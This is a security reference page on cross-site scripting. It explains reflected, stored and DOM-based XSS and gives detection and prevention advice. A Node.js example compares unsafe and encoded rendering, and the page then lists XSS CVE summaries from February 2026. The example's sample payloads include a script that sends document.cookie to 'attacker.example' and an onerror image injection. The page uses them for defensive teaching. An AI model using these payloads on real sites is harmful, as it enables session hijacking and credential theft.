Cross-Site Scripting

Cross-Site Scripting (XSS) vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. This can lead to session hijacking, credential theft, and phishing attacks.

Total CVEs: 110
Typical Severity: MEDIUM
Category: General

Understanding Cross-Site Scripting

XSS arises when a web application places attacker-controlled data into a page without encoding it for the context in which it lands (HTML body, attribute value, URL, or script). Reflected XSS returns the payload from the current request, typically a crafted link the victim has to click; stored XSS persists it (comments, profile fields, uploaded files such as SVG) so it fires for every later viewer; DOM-based XSS occurs when client-side script writes untrusted data into the document through sinks such as innerHTML. Because the injected script runs with the site's origin, it can read cookies and storage not protected by HttpOnly, send requests with the victim's session, and rewrite the page for phishing.

How to Identify

  • Review vendor and CVE advisories for the CMS cores, plugins, themes and commenting servers you deploy; many of the entries below are third-party components rather than custom code.
  • Test every place user input is echoed back (URL parameters, form fields, comments, profile and customer names, uploaded file contents) with context-breaking probes such as "><img src=x onerror=...> and check whether the characters come back encoded.
  • Check how uploaded files are served: an SVG or HTML file reachable at a direct URL on the main origin executes script in that origin even if it looks harmless when embedded as an image.
  • Combine automated scanning with manual review in regular security testing; scanners miss stored and DOM-based cases that need a second request or client-side analysis.

Prevention Best Practices

  • Encode output for the context it lands in (HTML text, attribute, URL, JavaScript) using the templating engine's escaping rather than ad-hoc string concatenation; input validation complements encoding but does not replace it.
  • Deploy a Content Security Policy that disallows inline script (nonce- or hash-based script-src) so an injected <script> or event handler does not execute even where encoding was missed.
  • Mark session cookies HttpOnly so injected script cannot read them, and set SameSite to limit their use across sites.
  • Serve user uploads from a separate origin, or with Content-Disposition: attachment for types such as SVG, or sanitise them on upload.
  • Keep CMS cores, plugins and themes updated; the entries below note fixed versions where vendors have published them.
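As an added example (not code from this page or from any of the listed projects), the following Node.js snippet places the vulnerable concatenation pattern behind the reflected-parameter cases in the list beside its hardened form: contextual HTML encoding for text and quoted-attribute values, and a scheme check for attacker-supplied links. The function names, the greeting and customer-link markup, and the sample payloads are all constructed for illustration.

```javascript
// Added example for this page: contextual output encoding versus raw string
// concatenation. Names, markup and payloads are constructed for illustration;
// none of it comes from the projects listed on the page.

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Allow only http, https or scheme-less (relative) links in href/src.
// Browsers drop ASCII control characters and whitespace inside a scheme, so
// "java\tscript:" is still javascript:; normalise the same way before deciding.
function safeHref(url) {
  const raw = String(url);
  const probe = raw.replace(/[\u0000-\u0020]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(probe);
  if (m && m[1] !== "http" && m[1] !== "https") return "#"; // javascript:, data:, vbscript:, ...
  return raw;
}

// VULNERABLE: the request parameter lands in the HTML text context unencoded.
// "?name=<script>...</script>" becomes live script for whoever opens the link.
function renderGreetingUnsafe(name) {
  return `<p>Hello ${name}</p>`;
}

// HARDENED: same template, value encoded for the HTML text context.
function renderGreetingSafe(name) {
  return `<p>Hello ${escapeHtml(name)}</p>`;
}

// HARDENED, two further contexts: a quoted attribute and a URL. The attribute
// value is encoded (so a closing quote cannot start a new on* handler) and the
// URL is scheme-checked first, then encoded for the attribute it sits in.
function renderCustomerLinkSafe(customerName, profileUrl) {
  const name = escapeHtml(customerName);
  const href = escapeHtml(safeHref(profileUrl));
  return `<a href="${href}" title="${name}">${name}</a>`;
}

// Demo heuristic only, not a sanitizer: reports a raw <script> element or an
// on* handler attribute inside a raw tag. It is enough to compare the two
// greeting renderers on the same payload (encoded output has no raw "<").
function containsLiveScript(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed sample payloads modelled on the reflected-parameter cases above.
const SAMPLE_PAYLOADS = [
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>',
  '"><img src=x onerror=alert(document.domain)>',
];

// Render each payload through both greeting renderers and report which output
// still carries executable markup.
function demo() {
  return SAMPLE_PAYLOADS.map((p) => ({
    payload: p,
    unsafeExecutes: containsLiveScript(renderGreetingUnsafe(p)),
    safeExecutes: containsLiveScript(renderGreetingSafe(p)),
  }));
}

console.table(demo());
```

Run it with `node` to see the comparison table; `unsafeExecutes` is true and `safeExecutes` false for both payloads. The scheme check deliberately lets protocol-relative links (`//host/path`) through, since they resolve to http or https; block them too if the link must stay on your own host.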

Cross-Site Scripting CVEs (110)

Each entry lists: CVE ID and score, description, vendor / product, exploit status, date.
CVE-2025-11950 (score 6.1)

EduAsist fails to neutralise user-supplied input before placing it in a web page, so an attacker can inject scripts that run in other users' browsers and steal sensitive information or hijack their sessions. The issue affects the platform until February 2026.

Vendor / Product: eduasist / eduasist
Exploit Status: Exploit Available
Date: Feb 27, 2026
CVE-2026-24351 (score 5.1)

A user with editing privileges on a PluXml CMS site can store HTML and JavaScript in static pages; the script runs in the browser of anyone who visits those pages, allowing the attacker to steal visitor data or perform actions on visitors' behalf without their consent.

Vendor / Product: pluxml / pluxml
Exploit Status: Theoretical
Date: Feb 27, 2026
CVE-2026-24350 (score 5.1)

An authenticated user can upload an SVG file containing script to a PluXml CMS site. Embedding the image through an image link does not trigger it, but a victim who opens the file's URL directly executes the script, because browsers run scripts in an SVG loaded as a top-level document but not in one rendered through an <img> element.

Vendor / Product: pluxml / pluxml
Exploit Status: Exploit Available
Date: Feb 27, 2026
CVE-2026-1434 (score 5.1)

A URL parameter is reflected into the page without encoding, so an attacker can craft a link that runs JavaScript in the browser of any user who clicks it, stealing information or taking over the session. Fixed in version 4.6.7.

Vendor / Product: pw / omega-psir
Exploit Status: Exploit Available
Date: Feb 27, 2026
CVE-2025-56605 (score 5.4)

The event management system's registration process fails to properly check user input, allowing an attacker to inject JavaScript that runs in a victim's browser. The attacker must trick the victim into clicking a crafted link that sends the malicious request to the vulnerable system.

Vendor / Product: Unknown
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2026-2680 (score 4.8)

A crafted VAT number in a link to a specific A3factura page is reflected without encoding and runs as script in the browser of a victim who clicks the link. Only users who interact with that page are exposed.

Vendor / Product: wolterskluwer / a3factura
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2026-2679 (score 4.8)

A manipulated customer name parameter in a specific A3factura URL is reflected into the page and executes as script when the victim opens the attacker's crafted link.

Vendor / Product: wolterskluwer / a3factura
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2026-2678 (score 4.8)

Input in the 'name' parameter of an A3factura page is reflected without encoding; a victim who clicks a crafted link runs attacker-controlled script, which can lead to unauthorized actions or data theft.

Vendor / Product: wolterskluwer / a3factura
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2026-2677 (score 4.8)

A specific A3factura page reflects a crafted parameter into its content, so script runs in the browser of a victim who clicks the attacker's link.

Vendor / Product: wolterskluwer / a3factura
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2025-14343 (score 7.6)

The E-Commerce Product improperly handles user input, letting an attacker inject scripts into pages viewed by users; tricking a user into clicking a crafted link is enough to steal sensitive data such as login credentials.

Vendor / Product: Unknown
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2026-28132 (score 5.3)

The WooCommerce Photo Reviews plugin, up to version 1.4.4, does not properly filter submitted content, so an attacker who can get harmful content accepted by the plugin can inject code into the pages it renders, leading to unauthorized actions or data theft from users.

Vendor / Product: Unknown
Exploit Status: Theoretical
Date: Feb 26, 2026
CVE-2026-28083 (score 6.5)

The Flatsome theme, up to and including 3.20.1, stores and later displays attacker-supplied content without neutralising it (stored XSS); the script runs in the browsers of users viewing the affected pages and can steal sensitive information or hijack sessions. Exploitation requires a way to submit content the site stores and displays.

Vendor / Product: Unknown
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2026-1695 (score 5.3)

The error page of the OAuth server used by certain PcVue features can be abused to make a legitimate user load malicious content from another site when their login attempt fails. It triggers only on an authentication error, so it targets users in the act of signing in.

Vendor / Product: Unknown
Exploit Status: Exploit Available
Date: Feb 26, 2026
CVE-2026-26464 (score 6.1)

The name parameter of the user-edit function in the Society Management System is not neutralised, so a crafted request stores JavaScript that runs in the browser of anyone, administrators included, who views the affected content.

Vendor / Product: kashipara / society management system portal
Exploit Status: Exploit Available
Date: Feb 23, 2026
CVE-2025-40986 (score 5.1)

A crafted URL, when opened by a victim, runs attacker-controlled JavaScript in the victim's browser, exposing session cookies or allowing actions on the user's behalf. The attacker must deliver the link and the victim must click it for the attack to succeed.

Vendor / Product: Unknown
Exploit Status: Theoretical
Date: Feb 23, 2026
CVE-2026-2946 (score 5.1)

The comments feature of rymcu forest, up to version 0.0.5, lets an attacker store scripts that run for users who view the comments. The exploit is public and can be used remotely by anyone able to reach the comments feature.

Vendor / Product: rymcu / forest
Exploit Status: Exploit Available
Date: Feb 22, 2026
CVE-2026-27469 (score 6.1)

Older versions of the Isso commenting server allow scripts injected into comments to execute when other users view those comments. Enabling comment moderation reduces but does not eliminate the risk, since a moderator may approve a malicious comment.

Vendor / Product: Unknown
Exploit Status: Theoretical
Date: Feb 21, 2026
CVE-2025-67991 (score 7.1)

The User Extra Fields plugin, up to version 16.8, lets injected scripts execute in the browsers of users visiting affected pages, exposing sensitive information such as cookies or login credentials. The attacker must trick users into clicking a crafted link.

Vendor / Product: Unknown
Exploit Status: Theoretical
Date: Feb 20, 2026
CVE-2025-67990 (score 7.1)

Specific versions of the GMap Targeting tool place attacker-supplied input into pages viewed by users without neutralising it; tricking a user into clicking a crafted link is enough to run script that can steal login credentials.

Vendor / Product: Unknown
Exploit Status: Theoretical
Date: Feb 20, 2026
CVE-2025-67984 (score 7.1)

NPS computy, up to and including 2.8.2, allows script injection into pages viewed by users, leading to unauthorized actions or data theft; the attacker must lure users to a compromised page.

Vendor / Product: Unknown
Exploit Status: Theoretical
Date: Feb 20, 2026
Showing 21 to 40 of 110 results